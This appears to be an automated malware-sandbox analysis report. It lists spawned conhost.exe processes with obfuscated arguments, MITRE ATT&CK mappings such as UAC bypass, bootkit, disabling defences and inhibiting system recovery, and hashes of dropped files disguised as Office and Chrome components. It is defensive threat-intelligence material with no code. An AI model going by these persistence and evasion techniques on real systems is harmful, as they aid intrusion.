C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1053915251259099392-116362075118462088342084331145281691791-63443010585496529"
1⤵
PID:2700

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1907920999-985825440-8180807541871872982158048893617069357951259322833-1019774063"
1⤵
PID:2460

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4750249985467561641121490190-1040471862088600833212275596170081797-1421108534"
1⤵
PID:1384

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "62383517-108438657-1651005167554467243-467907186175214229720539741521545017049"
1⤵
PID:2528

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1453961417-1310897405-233346797-1400735885888056659842433642113372793251072964"
1⤵
PID:976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1354856374760787724-71951028667567594952922861880805567-14928522231761468972"
1⤵
PID:2520

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-12090407352700890031893664736349058680-1045336182-14107884461107110220-1079595835"
1⤵
PID:2396

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "552525167710754569-243999726933469227-684881541-962588082159393430773874376"
1⤵
PID:2964

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1756251518-1583926030-17714308331421011522-86946551578864041607310436327061326"
1⤵
PID:2952

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-124908474842725971-520997920-1370317150381093584-21136620481951020145-243875543"
1⤵
PID:1736

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "66068614919575737441310791736-122705031715610371832024115509-538166649911222049"
1⤵
PID:204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-823955412-350820589574701350-1788572620-655656042-4098372632364719211846649818"
1⤵
PID:1920

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "405194388-150692236305144369-1619697916-1584614585-419128045684526818-20319789"
1⤵
PID:1980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-581503850-126730848817525626271480283566115109286066410460552572210-579706971"
1⤵
PID:2488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.exe

Filesize
1.8MB

MD5
afdbdd9d7b5b76ffb54cc0ba539cfdc2

SHA1
416e248941ed00350b7754fd2d6aec5c23288f74

SHA256
8d2ef780c1c057576ef730238319a003b03820aadacbcf80cb7bee3631d13be9

SHA512
7d0933e45477804dc44808a9f36d11c45355193d89aaac620551ab104419cf4cab881e86408166cfc882e6a838751b5ac884d6657d31de52fd3aa3fc6a15e150

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\msvcp120ex.dll

Filesize
8.0MB

MD5
9afcb772473053f3f5137deea456da4f

SHA1
9fb1bd69cf0c87b1e9b127c2e6a3db2b7872fd11

SHA256
f7337fec1f5f495e36f8f0b6295592db8f2c1a1ca1c580b431244344532454fc

SHA512
f2ceb1ba9c70bba9b64e013435d57d2353f3781cce2e01f4aabe151e1389dcc0b1dba54f3da9159b5d56a487cb2c4eda8d013734f57d143a099e38d59dc22cec

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\RCXD145.tmp

Filesize
360KB

MD5
218e18002822b9a3f9fbb5b609f24a03

SHA1
b50a0f3a9d2faf51278081a35f131035ad3860b6

SHA256
e33aecf0678644129fd44a7711a50ca3e648bd92d2a2d9559145f2d3207e5f4e

SHA512
e619f4a104def71c06e52a2a0b8a23dfddafec3cf7d7205217c38fc3a1d474aa8f7e0dc398d6b9b19a6eb272a092d3ae164e4fe763630994b90425ff6fa5480d

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\msvcp120ex.dll

Filesize
8.0MB

MD5
ded051be69dd3bca348fa528f52d6eb5

SHA1
dad76cb59c4d8460e45367e97d00f59051235b39

SHA256
a263703159157a5d0c4f327fd64e58b4111ec2ec3df1cfe9537792f44214ecba

SHA512
b1667bcd26e78a08bbf44f48b7413fff37f1edf7fa6d7404f1052e8f31aed9141f6ea3f46b8549f1dbd2f28b3527164ea264b8de419b94c47ccba39721ecabb6

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\msvcp120ex.dll

Filesize
8.0MB

MD5
163c5d82f0ac179b822d5e1c3adcc8e4

SHA1
224ae8de99303a2e724b9c184c17bd82b77e4c45

SHA256
6326bd8d14df85525aa42d54b907e488a96f208db3f6a6af268aa88c444dd8ef

SHA512
e163fb405219cde12254c1600ba62574ae95bde27d7b4dca07b99e465282511433d10a43c7f1f5c95c0fcdce112038d323971a3ba7c0aa6ce76b1b3ebd7be7ee

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\msvcp120ex.dll

Filesize
8.0MB

MD5
bb54971ac531568dcea28546a9862a2e

SHA1
49b59df563f0a1a49f405879b3d634d53714fffc

SHA256
409c53942308d72a2c4716392cc1815b7bd52446b1ebe6df543d67b58feb4b87

SHA512
312d1160820593cc8fe056f642edcca71608ef535e7268ada461905542b66606983bda645ac758a6467dbe0a792fe069e2d96e55af10618b19c04b9159dc87ef

Download Submit
C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\msvcp120ex.dll

Filesize
8.0MB

MD5
381e1b6421f100eaee7cee135d920b9b

SHA1
fac7a279cc4f8d06fe3c7885b98aa81f43e8b68d

SHA256
a0b3d36e9d6871fbdfc157f49c39f586bd03261a791a978753dd3779dd01a74e

SHA512
ed48919a0fdefc47ad66b6f3ef8a4f24f4e522070d9a29bfc7bb64b45e10ee8a257838bf210f592f385fa1cb4cadd2b22aca63feb2f9ee49186f8e4a0970a6c6

Download Submit
C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\msvcp120ex.dll

Filesize
8.0MB

MD5
70718837e75310614d92e214bdce13d8

SHA1
08c69281a298dcd819c2e2048b1bf4e9bfad3bea

SHA256
85cb7ae60371bbaf6a651c91cf4695a60fdae09a5aaf18a682f52de2feb10af7

SHA512
48b28ed64549b3bdb8286d19ae04f5052fc7b92a9761fab1d3bb90d2bc3a0d616b8839dfc00a0e22474689312753fa47a89d8f5832e7c60ae8091b99712a9d2b

Download Submit
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\msvcp120ex.dll

Filesize
8.0MB

MD5
f049e075a8523eb1c7a1a61938e568d7

SHA1
6d5cd942b2f03fe2c24b645ddbe8dd858c3f31d1

SHA256
c0923016f36f90efbacb80c40e2c12b7f835c18451889a96c7ed1c034c958e5e

SHA512
94db2d2ac36703973fbffa0c14309d9eb5b1ba770e898ca01b86a7f281740ed2b721d77b8e67a2c63fa6709df1ca01d694e9684132cca243a3539452c9de64a0

Download Submit
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\522081887

Filesize
246KB

MD5
8eadc2e481db831536dfdc73f1b31265

SHA1
a4bb865dbca2b2c7b67743a3054f1fcbf6fd2e19

SHA256
a9fb6b13900c998de6847b3a741d8a0237b89268f29a1f218d0d1208784d958c

SHA512
8b7f2706a3dbb64c9f40044566b29488b9e44d6834af65c8d0c6917c7234c7fa2765e41255948ca90a4a8b2af850dce77e1f111ef4d7e5066b1c581ef4169380

Download Submit
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\msvcp120ex.dll

Filesize
8.0MB

MD5
80cd1de76573f501c71a9cc9180f5b69

SHA1
ecf62140395533b5e9e7f4886e86a9bb94c503ef

SHA256
fdcf3efcb73ac10f5b4956fa6037edf02b9d089d8abc389d50f446efd4dbc461

SHA512
533194b54ae5428d835d69b4ac6d994723dfe2015e328975165a639320ba08b57c9067489032f6aec61d14097b4923d423a890beb93802704dc96e3a35f13a61

Download Submit
C:\Program Files\Common Files\Microsoft Shared\ink\msvcp120ex.dll

Filesize
8.0MB

MD5
738de8dec3b9fb12cb5012db9fc0be62

SHA1
fe581f9b33221b2a483b3991771d72368d3eb2e3

SHA256
bb63b2b40867407087ac99128fd070a894c61a2ba33e314bc91e08fd9c9a6b34

SHA512
a128324f7f9c7b775e528b7a76bd33d3c63a4cba09e5bae0865a09f109b8f423602ddfdca4d0c534ed73d6b5af1244371757cd89ce96f6667048354c061a482d

Download Submit
C:\Program Files\Google\Chrome\Application\106.0.5249.119\411413135

Filesize
1.9MB

MD5
4f46146f004b46e51d63f878e5ba0b19

SHA1
179915b57b0b4590fc53b98751638649eff1e0e7

SHA256
ab665e128b67d21eceaa48d6d171c49f9531ba73f1a0179e9f4162d5cb556b57

SHA512
be012a272ab268fde3b254888a4d4684133e4e05e2f97761cf4fca491c545007167bf4fb0ff56d72731a6caaf6c2ccac27b7c1d4da033517dcc4d1c76aaa7654

Download Submit
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\971963290

Filesize
4.3MB

MD5
9c0c7b91790c2dabb1e997e4f40f1602

SHA1
419dfa1bf1687f618fde12fdecf44e560ca2c3c0

SHA256
fecb87d71a530ece11add1a18f42ab8091881cc18ca0910ec02489be5ce285b5

SHA512
7a0697559a383a0757e159d1cbb9c21e6681aca4f51c19234d67aa60160dbf650de762107cd24ac747a231b5468ce41f064534519dbf68c055357aa2e360245d

Download Submit
C:\Users\Admin\AppData\Local\Temp\782491483

Filesize
307KB

MD5
f1a9b4b1f750bb90b7240f38aa3fd939

SHA1
4d630bd6b89f4ba0315ed37035d5e32775a7b969

SHA256
7cc9be747a138d8b9e716ee5f16188215b730af91d9fe954d8e172f515f5b498

SHA512
e4d6eea0e415d27f39224af29cef84bd55fb098b06c7aaee38d6eac34621ca3585bbae0d2fc2938bbe5755fd6d3bbbf47f9c4bc29a6e6914f761c1c76e4a107f

Download Submit
C:\Windows\System32\msconfig.exe

Filesize
57KB

MD5
cf45949cdbb39c953331cdcb9cec20f8

SHA1
6756f752141602424af234433dadedc12520165d

SHA256
34df739526c114bb89470b3b650946cbf7335cb4a2206489534fb05c1fc143a8

SHA512
b699b406bb4df8c6fb6339219ab1feaa5c7b2c39082d3761689e9b5326e52861bb8e2770d683838b05e649ff2022f413dc1e3f7e605a03077190f8950f9442be

Download Submit
memory/1804-309-0x000007FEF5D50000-0x000007FEF673C000-memory.dmp

Filesize
9.9MB

Download
memory/1804-261-0x000007FEF5D53000-0x000007FEF5D54000-memory.dmp

Filesize
4KB

Download
memory/1804-351-0x000000001AC80000-0x000000001ACE0000-memory.dmp

Filesize
384KB

Download
memory/1804-0-0x000007FEF5D53000-0x000007FEF5D54000-memory.dmp

Filesize
4KB

Download
memory/1804-2-0x000007FEF5D50000-0x000007FEF673C000-memory.dmp

Filesize
9.9MB

Download
memory/1804-1-0x0000000000DD0000-0x00000000015E2000-memory.dmp

Filesize
8.1MB

Download